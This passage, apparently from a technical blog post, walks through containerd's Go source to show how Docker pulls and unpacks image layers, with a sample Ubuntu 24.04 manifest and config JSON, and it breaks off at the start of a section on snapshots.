<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">u</span> <span class="o">*</span><span class="n">Unpacker</span><span class="p">)</span> <span class="n">Unpack</span><span class="p">(</span><span class="n">h</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span><span class="p">)</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">images</span><span class="o">.</span><span class="n">HandlerFunc</span><span class="p">(</span><span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">children</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">h</span><span class="o">.</span><span class="n">Handle</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// [3]</span>
        <span class="c">// [...]</span>
        <span class="k">if</span> <span class="n">images</span><span class="o">.</span><span class="n">IsManifestType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="p">{</span> <span class="c">// [4]</span>
            <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">child</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">children</span> <span class="p">{</span>
                <span class="c">// [...]</span>
                <span class="k">if</span> <span class="n">images</span><span class="o">.</span><span class="n">IsLayerType</span><span class="p">(</span><span class="n">child</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="o">||</span> <span class="n">layerTypes</span><span class="p">[</span><span class="n">child</span><span class="o">.</span><span class="n">MediaType</span><span class="p">]</span> <span class="p">{</span>
                    <span class="n">manifestLayers</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">manifestLayers</span><span class="p">,</span> <span class="n">child</span><span class="p">)</span>
                <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                    <span class="n">nonLayers</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">nonLayers</span><span class="p">,</span> <span class="n">child</span><span class="p">)</span>
                <span class="p">}</span>
            <span class="p">}</span>

            <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">nl</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">nonLayers</span> <span class="p">{</span>
                <span class="n">layers</span><span class="p">[</span><span class="n">nl</span><span class="o">.</span><span class="n">Digest</span><span class="p">]</span> <span class="o">=</span> <span class="n">manifestLayers</span> <span class="c">// [5]</span>
            <span class="p">}</span>
            <span class="n">children</span> <span class="o">=</span> <span class="n">nonLayers</span> <span class="c">// [7]</span>

        <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="n">images</span><span class="o">.</span><span class="n">IsConfigType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="o">||</span> <span class="n">configTypes</span><span class="p">[</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">]</span> <span class="p">{</span>
            <span class="c">// "application/vnd.docker.container.image.v1+json" or "application/vnd.oci.image.config.v1+json"</span>
            <span class="c">// [...]</span>
            <span class="n">l</span> <span class="o">:=</span> <span class="n">layers</span><span class="p">[</span><span class="n">desc</span><span class="o">.</span><span class="n">Digest</span><span class="p">]</span>
            <span class="c">// [...]</span>
            <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">l</span><span class="p">)</span> <span class="o">&gt;</span> <span class="m">0</span> <span class="p">{</span>
                <span class="n">u</span><span class="o">.</span><span class="n">eg</span><span class="o">.</span><span class="n">Go</span><span class="p">(</span><span class="k">func</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
                    <span class="k">return</span> <span class="n">u</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">l</span><span class="p">)</span> <span class="c">// [6]</span>
                <span class="p">})</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We take one of the manifest data from pulling a <code class="language-plaintext highlighter-rouge">Ubuntu:24.04</code> image as an example. When getting the JSON response below, <code class="language-plaintext highlighter-rouge">unpack()</code> gets two sub-descriptors: a config and a layer, so children will be like <code class="language-plaintext highlighter-rouge">[config, layer1, ... (if any)]</code>. It first assigns <code class="language-plaintext highlighter-rouge">layers[0b1...b27] = [b40...081 (layer sub-descriptor)]</code> [5], and the next round the config descriptor is processed and <code class="language-plaintext highlighter-rouge">layers[0b1...b27]</code> is unpacked [6].</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="nl">"schemaVersion"</span><span class="p">:</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w">
    </span><span class="nl">"mediaType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/vnd.oci.image.manifest.v1+json"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"config"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
        </span><span class="nl">"mediaType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/vnd.oci.image.config.v1+json"</span><span class="p">,</span><span class="w">
        </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">2051</span><span class="p">,</span><span class="w">
        </span><span class="nl">"digest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:0b1ebe5dd42682bb8eda97ecf10a09f70f18d2d4af35f82b9271badac5dbeb27"</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="nl">"layers"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
        </span><span class="p">{</span><span class="w">
            </span><span class="nl">"mediaType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/vnd.oci.image.layer.v1.tar+gzip"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">29732978</span><span class="p">,</span><span class="w">
            </span><span class="nl">"digest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:b40150c1c2717d324cdb17278c8efdfa4dfcd2ffe083e976f0bcedf31115f081"</span><span class="w">
        </span><span class="p">}</span><span class="w">
    </span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">unpack()</code> first unmarshals the config descriptor into <code class="language-plaintext highlighter-rouge">i</code> [8] and later calls <code class="language-plaintext highlighter-rouge">u.fetch()</code> [9] to download the layer data. After it’s downloaded, <code class="language-plaintext highlighter-rouge">a.Apply()</code> is called to unpack the compressed layer [10].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">u</span> <span class="o">*</span><span class="n">Unpacker</span><span class="p">)</span> <span class="n">unpack</span><span class="p">(</span>
    <span class="n">h</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span><span class="p">,</span>
    <span class="n">config</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span>
    <span class="n">layers</span> <span class="p">[]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span>
<span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">p</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">content</span><span class="o">.</span><span class="n">ReadBlob</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">u</span><span class="o">.</span><span class="n">content</span><span class="p">,</span> <span class="n">config</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">var</span> <span class="n">i</span> <span class="n">unpackConfig</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Unmarshal</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">i</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [8]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">topHalf</span> <span class="o">:=</span> <span class="k">func</span><span class="p">(</span><span class="n">i</span> <span class="kt">int</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">span</span> <span class="o">*</span><span class="n">tracing</span><span class="o">.</span><span class="n">Span</span><span class="p">,</span> <span class="n">startAt</span> <span class="n">time</span><span class="o">.</span><span class="n">Time</span><span class="p">)</span> <span class="p">(</span><span class="o">&lt;-</span><span class="k">chan</span> <span class="o">*</span><span class="n">unpackStatus</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">key</span> <span class="o">=</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="n">snapshots</span><span class="o">.</span><span class="n">UnpackKeyFormat</span><span class="p">,</span> <span class="n">uniquePart</span><span class="p">(),</span> <span class="n">chainID</span><span class="p">)</span>
        <span class="n">mounts</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">sn</span><span class="o">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// call s.createSnapshot() -&gt; mounts := s.buildMounts()</span>
        <span class="c">// [...]</span>
        <span class="k">go</span> <span class="k">func</span><span class="p">(</span><span class="n">i</span> <span class="kt">int</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">err</span> <span class="o">:=</span> <span class="n">u</span><span class="o">.</span><span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">h</span><span class="p">,</span> <span class="n">layers</span><span class="p">[</span><span class="n">i</span><span class="o">:</span><span class="p">],</span> <span class="n">fetchC</span><span class="p">)</span> <span class="c">// [9]</span>
        <span class="p">}(</span><span class="n">i</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">diff</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">a</span><span class="o">.</span><span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">mounts</span><span class="p">,</span> <span class="n">unpack</span><span class="o">.</span><span class="n">ApplyOpts</span><span class="o">...</span><span class="p">)</span> <span class="c">// [10]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">desc</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">layers</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">statusCh</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">topHalf</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">layerSpan</span><span class="p">,</span> <span class="n">unpackLayerStart</span><span class="p">)</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The config is represented as the <code class="language-plaintext highlighter-rouge">unpackConfig</code> structure.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.go</span>
<span class="k">type</span> <span class="n">unpackConfig</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">ocispec</span><span class="o">.</span><span class="n">Platform</span>
    <span class="n">RootFS</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">RootFS</span> <span class="s">`json:"rootfs"`</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The config JSON blob looks like:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"architecture"</span><span class="p">:</span><span class="w"> </span><span class="s2">"amd64"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"config"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"Hostname"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Domainname"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"User"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStdout"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStderr"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Tty"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OpenStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"StdinOnce"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Env"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"Cmd"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"/bin/bash"</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"Image"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:337382923f7584f260a9a67e7625aaf9d42c24784c6e92731c29fa3912ae5c47"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Volumes"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"WorkingDir"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Entrypoint"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OnBuild"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Labels"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"org.opencontainers.image.version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"24.04"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">},</span><span class="w">
  </span><span class="nl">"container"</span><span class="p">:</span><span class="w"> </span><span class="s2">"824f27add47a9b8b83f4296fcbd9772627dd3ab13c39c889306a30cd4e2e1fc1"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"container_config"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"Hostname"</span><span class="p">:</span><span class="w"> </span><span class="s2">"824f27add47a"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Domainname"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"User"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStdout"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStderr"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Tty"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OpenStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"StdinOnce"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Env"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"Cmd"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"/bin/sh"</span><span class="p">,</span><span class="w">
      </span><span class="s2">"-c"</span><span class="p">,</span><span class="w">
      </span><span class="s2">"#(nop) "</span><span class="p">,</span><span class="w">
      </span><span class="s2">"CMD [</span><span class="se">\"</span><span class="s2">/bin/bash</span><span class="se">\"</span><span class="s2">]"</span><span class="w">
    </span><span class="p">],</span><span class="w">
    </span><span class="nl">"Image"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:337382923f7584f260a9a67e7625aaf9d42c24784c6e92731c29fa3912ae5c47"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Volumes"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"WorkingDir"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Entrypoint"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"OnBuild"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Labels"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"org.opencontainers.image.version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"24.04"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">},</span><span class="w">
  </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:18.133477895Z"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"docker_version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"26.1.3"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"history"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:15.45210454Z"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"created_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/sh -c #(nop)  ARG RELEASE"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"empty_layer"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:15.493474875Z"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"created_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/sh -c #(nop)  ARG LAUNCHPAD_BUILD_ARCH"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"empty_layer"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:15.521658623Z"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"created_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/sh -c #(nop)  LABEL org.opencontainers.image.version=24.04"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"empty_layer"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:17.706887224Z"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"created_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/sh -c #(nop) ADD file:8ce1caf246e7c778bca84c516d02fd4e83766bb2c530a0fffa8a351b560a2728 in / "</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T06:49:18.133477895Z"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"created_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/sh -c #(nop)  CMD [</span><span class="se">\"</span><span class="s2">/bin/bash</span><span class="se">\"</span><span class="s2">]"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"empty_layer"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">],</span><span class="w">
  </span><span class="nl">"os"</span><span class="p">:</span><span class="w"> </span><span class="s2">"linux"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"rootfs"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"layers"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"diff_ids"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="s2">"sha256:538812a4b9bd45adaac2b5e5b967daa6999aa44eb110aa32ae7c69702b906475"</span><span class="w">
    </span><span class="p">]</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">fetch()</code> calls <code class="language-plaintext highlighter-rouge">h.Handle(ctx2, desc)</code> with the layer’s descriptor [11], which calls chained handler, including the download handler — <strong><code class="language-plaintext highlighter-rouge">.FetchHandler()</code></strong>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">u</span> <span class="o">*</span><span class="n">Unpacker</span><span class="p">)</span> <span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">h</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span><span class="p">,</span> <span class="n">layers</span> <span class="p">[]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">done</span> <span class="p">[]</span><span class="k">chan</span> <span class="k">struct</span><span class="p">{})</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">eg</span><span class="o">.</span><span class="n">Go</span><span class="p">(</span><span class="k">func</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
        <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">desc</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">layers</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">h</span><span class="o">.</span><span class="n">Handle</span><span class="p">(</span><span class="n">ctx2</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// [11]</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Apply()</code> <strong>sends an apply request to <code class="language-plaintext highlighter-rouge">containerd</code></strong> [12] with the layer descriptor.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/diff/proxy/differ.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">diffRemote</span><span class="p">)</span> <span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">mounts</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">diff</span><span class="o">.</span><span class="n">ApplyOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">req</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">diffapi</span><span class="o">.</span><span class="n">ApplyRequest</span><span class="p">{</span>
        <span class="n">Diff</span><span class="o">:</span>     <span class="n">oci</span><span class="o">.</span><span class="n">DescriptorToProto</span><span class="p">(</span><span class="n">desc</span><span class="p">),</span>
        <span class="n">Mounts</span><span class="o">:</span>   <span class="n">mount</span><span class="o">.</span><span class="n">ToProto</span><span class="p">(</span><span class="n">mounts</span><span class="p">),</span>
        <span class="n">Payloads</span><span class="o">:</span> <span class="n">payloads</span><span class="p">,</span>
        <span class="n">SyncFs</span><span class="o">:</span>   <span class="n">config</span><span class="o">.</span><span class="n">SyncFs</span><span class="p">,</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/api/services/diff/v1/diff_grpc.pb.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">diffClient</span><span class="p">)</span> <span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">in</span> <span class="o">*</span><span class="n">ApplyRequest</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">ApplyResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">out</span> <span class="o">:=</span> <span class="nb">new</span><span class="p">(</span><span class="n">ApplyResponse</span><span class="p">)</span>
    <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">cc</span><span class="o">.</span><span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="s">"/containerd.services.diff.v1.Diff/Apply"</span><span class="p">,</span> <span class="n">in</span><span class="p">,</span> <span class="n">out</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// [12]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>By now we know that the <strong>unpack operations are performed by <code class="language-plaintext highlighter-rouge">containerd</code></strong>, not <code class="language-plaintext highlighter-rouge">dockerd</code>.</p>

<h3 id="22-create-a-snapshot">2.2. Create A Snapshot</h3>

<p>Before delving into the unpacking implementation of <code class="language-plaintext highlighter-rouge">containerd</code>, let’s take a look at the snapshot mechanism.</p>

<p>A snapshot is a saved state of <strong>a filesystem layer</strong>, and it also defines how to mount these layers.</p>

<p>In <code class="language-plaintext highlighter-rouge">unpack()</code>, <code class="language-plaintext highlighter-rouge">sn.Prepare()</code> is called to create a snapshot [1].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">u</span> <span class="o">*</span><span class="n">Unpacker</span><span class="p">)</span> <span class="n">unpack</span><span class="p">(</span>
    <span class="n">h</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span><span class="p">,</span>
    <span class="n">config</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span>
    <span class="n">layers</span> <span class="p">[]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span>
<span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
